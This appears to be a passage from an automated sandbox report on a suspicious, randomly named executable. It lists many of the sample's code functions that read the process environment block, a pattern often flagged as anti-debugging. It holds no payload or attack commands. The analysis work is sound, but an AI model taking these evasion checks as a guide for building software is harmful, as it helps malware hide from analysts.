                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B656A mov eax, dword ptr fs:[00000030h]6_2_011B656A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B656A mov eax, dword ptr fs:[00000030h]6_2_011B656A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012005A7 mov eax, dword ptr fs:[00000030h]6_2_012005A7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012005A7 mov eax, dword ptr fs:[00000030h]6_2_012005A7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012005A7 mov eax, dword ptr fs:[00000030h]6_2_012005A7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE59C mov eax, dword ptr fs:[00000030h]6_2_011BE59C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B4588 mov eax, dword ptr fs:[00000030h]6_2_011B4588
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01182582 mov eax, dword ptr fs:[00000030h]6_2_01182582
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01182582 mov ecx, dword ptr fs:[00000030h]6_2_01182582
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A45B1 mov eax, dword ptr fs:[00000030h]6_2_011A45B1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A45B1 mov eax, dword ptr fs:[00000030h]6_2_011A45B1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011865D0 mov eax, dword ptr fs:[00000030h]6_2_011865D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA5D0 mov eax, dword ptr fs:[00000030h]6_2_011BA5D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA5D0 mov eax, dword ptr fs:[00000030h]6_2_011BA5D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE5CF mov eax, dword ptr fs:[00000030h]6_2_011BE5CF
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE5CF mov eax, dword ptr fs:[00000030h]6_2_011BE5CF
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC5ED mov eax, dword ptr fs:[00000030h]6_2_011BC5ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC5ED mov eax, dword ptr fs:[00000030h]6_2_011BC5ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011825E0 mov eax, dword ptr fs:[00000030h]6_2_011825E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE5E7 mov eax, dword ptr fs:[00000030h]6_2_011AE5E7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206420 mov eax, dword ptr fs:[00000030h]6_2_01206420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206420 mov eax, dword ptr fs:[00000030h]6_2_01206420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206420 mov eax, dword ptr fs:[00000030h]6_2_01206420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206420 mov eax, dword ptr fs:[00000030h]6_2_01206420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206420 mov eax, dword ptr fs:[00000030h]6_2_01206420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206420 mov eax, dword ptr fs:[00000030h]6_2_01206420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01206420 mov eax, dword ptr fs:[00000030h]6_2_01206420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B8402 mov eax, dword ptr fs:[00000030h]6_2_011B8402
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B8402 mov eax, dword ptr fs:[00000030h]6_2_011B8402
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B8402 mov eax, dword ptr fs:[00000030h]6_2_011B8402
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA430 mov eax, dword ptr fs:[00000030h]6_2_011BA430
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117C427 mov eax, dword ptr fs:[00000030h]6_2_0117C427
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117E420 mov eax, dword ptr fs:[00000030h]6_2_0117E420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117E420 mov eax, dword ptr fs:[00000030h]6_2_0117E420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117E420 mov eax, dword ptr fs:[00000030h]6_2_0117E420
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A245A mov eax, dword ptr fs:[00000030h]6_2_011A245A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C460 mov ecx, dword ptr fs:[00000030h]6_2_0120C460
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117645D mov eax, dword ptr fs:[00000030h]6_2_0117645D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AA470 mov eax, dword ptr fs:[00000030h]6_2_011AA470
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AA470 mov eax, dword ptr fs:[00000030h]6_2_011AA470
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AA470 mov eax, dword ptr fs:[00000030h]6_2_011AA470
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120A4B0 mov eax, dword ptr fs:[00000030h]6_2_0120A4B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B44B0 mov ecx, dword ptr fs:[00000030h]6_2_011B44B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011864AB mov eax, dword ptr fs:[00000030h]6_2_011864AB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011804E5 mov ecx, dword ptr fs:[00000030h]6_2_011804E5
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180710 mov eax, dword ptr fs:[00000030h]6_2_01180710
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B0710 mov eax, dword ptr fs:[00000030h]6_2_011B0710
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC700 mov eax, dword ptr fs:[00000030h]6_2_011BC700
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B273C mov eax, dword ptr fs:[00000030h]6_2_011B273C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B273C mov ecx, dword ptr fs:[00000030h]6_2_011B273C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B273C mov eax, dword ptr fs:[00000030h]6_2_011B273C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FC730 mov eax, dword ptr fs:[00000030h]6_2_011FC730
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC720 mov eax, dword ptr fs:[00000030h]6_2_011BC720
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC720 mov eax, dword ptr fs:[00000030h]6_2_011BC720
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180750 mov eax, dword ptr fs:[00000030h]6_2_01180750
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2750 mov eax, dword ptr fs:[00000030h]6_2_011C2750
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2750 mov eax, dword ptr fs:[00000030h]6_2_011C2750
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B674D mov esi, dword ptr fs:[00000030h]6_2_011B674D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B674D mov eax, dword ptr fs:[00000030h]6_2_011B674D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B674D mov eax, dword ptr fs:[00000030h]6_2_011B674D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188770 mov eax, dword ptr fs:[00000030h]6_2_01188770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01204755 mov eax, dword ptr fs:[00000030h]6_2_01204755
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E75D mov eax, dword ptr fs:[00000030h]6_2_0120E75D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122678E mov eax, dword ptr fs:[00000030h]6_2_0122678E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011807AF mov eax, dword ptr fs:[00000030h]6_2_011807AF
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E7E1 mov eax, dword ptr fs:[00000030h]6_2_0120E7E1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118C7C0 mov eax, dword ptr fs:[00000030h]6_2_0118C7C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011847FB mov eax, dword ptr fs:[00000030h]6_2_011847FB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011847FB mov eax, dword ptr fs:[00000030h]6_2_011847FB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012007C3 mov eax, dword ptr fs:[00000030h]6_2_012007C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A27ED mov eax, dword ptr fs:[00000030h]6_2_011A27ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A27ED mov eax, dword ptr fs:[00000030h]6_2_011A27ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A27ED mov eax, dword ptr fs:[00000030h]6_2_011A27ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2619 mov eax, dword ptr fs:[00000030h]6_2_011C2619
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE609 mov eax, dword ptr fs:[00000030h]6_2_011FE609
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118262C mov eax, dword ptr fs:[00000030h]6_2_0118262C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B6620 mov eax, dword ptr fs:[00000030h]6_2_011B6620
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B8620 mov eax, dword ptr fs:[00000030h]6_2_011B8620
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E627 mov eax, dword ptr fs:[00000030h]6_2_0119E627
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124866E mov eax, dword ptr fs:[00000030h]6_2_0124866E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124866E mov eax, dword ptr fs:[00000030h]6_2_0124866E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119C640 mov eax, dword ptr fs:[00000030h]6_2_0119C640
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B2674 mov eax, dword ptr fs:[00000030h]6_2_011B2674
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA660 mov eax, dword ptr fs:[00000030h]6_2_011BA660
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA660 mov eax, dword ptr fs:[00000030h]6_2_011BA660
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184690 mov eax, dword ptr fs:[00000030h]6_2_01184690
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184690 mov eax, dword ptr fs:[00000030h]6_2_01184690
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B66B0 mov eax, dword ptr fs:[00000030h]6_2_011B66B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC6A6 mov eax, dword ptr fs:[00000030h]6_2_011BC6A6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012006F1 mov eax, dword ptr fs:[00000030h]6_2_012006F1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012006F1 mov eax, dword ptr fs:[00000030h]6_2_012006F1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA6C7 mov ebx, dword ptr fs:[00000030h]6_2_011BA6C7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA6C7 mov eax, dword ptr fs:[00000030h]6_2_011BA6C7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120892A mov eax, dword ptr fs:[00000030h]6_2_0120892A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0121892B mov eax, dword ptr fs:[00000030h]6_2_0121892B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01178918 mov eax, dword ptr fs:[00000030h]6_2_01178918
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01178918 mov eax, dword ptr fs:[00000030h]6_2_01178918
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE908 mov eax, dword ptr fs:[00000030h]6_2_011FE908
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE908 mov eax, dword ptr fs:[00000030h]6_2_011FE908
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C912 mov eax, dword ptr fs:[00000030h]6_2_0120C912
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01224978 mov eax, dword ptr fs:[00000030h]6_2_01224978
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01224978 mov eax, dword ptr fs:[00000030h]6_2_01224978
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C97C mov eax, dword ptr fs:[00000030h]6_2_0120C97C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01200946 mov eax, dword ptr fs:[00000030h]6_2_01200946
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E mov eax, dword ptr fs:[00000030h]6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E mov edx, dword ptr fs:[00000030h]6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E mov eax, dword ptr fs:[00000030h]6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A6962 mov eax, dword ptr fs:[00000030h]6_2_011A6962
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A6962 mov eax, dword ptr fs:[00000030h]6_2_011A6962
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A6962 mov eax, dword ptr fs:[00000030h]6_2_011A6962
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012089B3 mov esi, dword ptr fs:[00000030h]6_2_012089B3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012089B3 mov eax, dword ptr fs:[00000030h]6_2_012089B3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012089B3 mov eax, dword ptr fs:[00000030h]6_2_012089B3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011809AD mov eax, dword ptr fs:[00000030h]6_2_011809AD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011809AD mov eax, dword ptr fs:[00000030h]6_2_011809AD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E9E0 mov eax, dword ptr fs:[00000030h]6_2_0120E9E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B49D0 mov eax, dword ptr fs:[00000030h]6_2_011B49D0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012169C0 mov eax, dword ptr fs:[00000030h]6_2_012169C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B29F9 mov eax, dword ptr fs:[00000030h]6_2_011B29F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B29F9 mov eax, dword ptr fs:[00000030h]6_2_011B29F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124A9D3 mov eax, dword ptr fs:[00000030h]6_2_0124A9D3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122483A mov eax, dword ptr fs:[00000030h]6_2_0122483A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122483A mov eax, dword ptr fs:[00000030h]6_2_0122483A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA830 mov eax, dword ptr fs:[00000030h]6_2_011BA830
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov ecx, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A2835 mov eax, dword ptr fs:[00000030h]6_2_011A2835
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C810 mov eax, dword ptr fs:[00000030h]6_2_0120C810
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184859 mov eax, dword ptr fs:[00000030h]6_2_01184859
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184859 mov eax, dword ptr fs:[00000030h]6_2_01184859
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B0854 mov eax, dword ptr fs:[00000030h]6_2_011B0854
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216870 mov eax, dword ptr fs:[00000030h]6_2_01216870
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216870 mov eax, dword ptr fs:[00000030h]6_2_01216870
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E872 mov eax, dword ptr fs:[00000030h]6_2_0120E872
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E872 mov eax, dword ptr fs:[00000030h]6_2_0120E872
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01192840 mov ecx, dword ptr fs:[00000030h]6_2_01192840
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180887 mov eax, dword ptr fs:[00000030h]6_2_01180887
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C89D mov eax, dword ptr fs:[00000030h]6_2_0120C89D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124A8E4 mov eax, dword ptr fs:[00000030h]6_2_0124A8E4
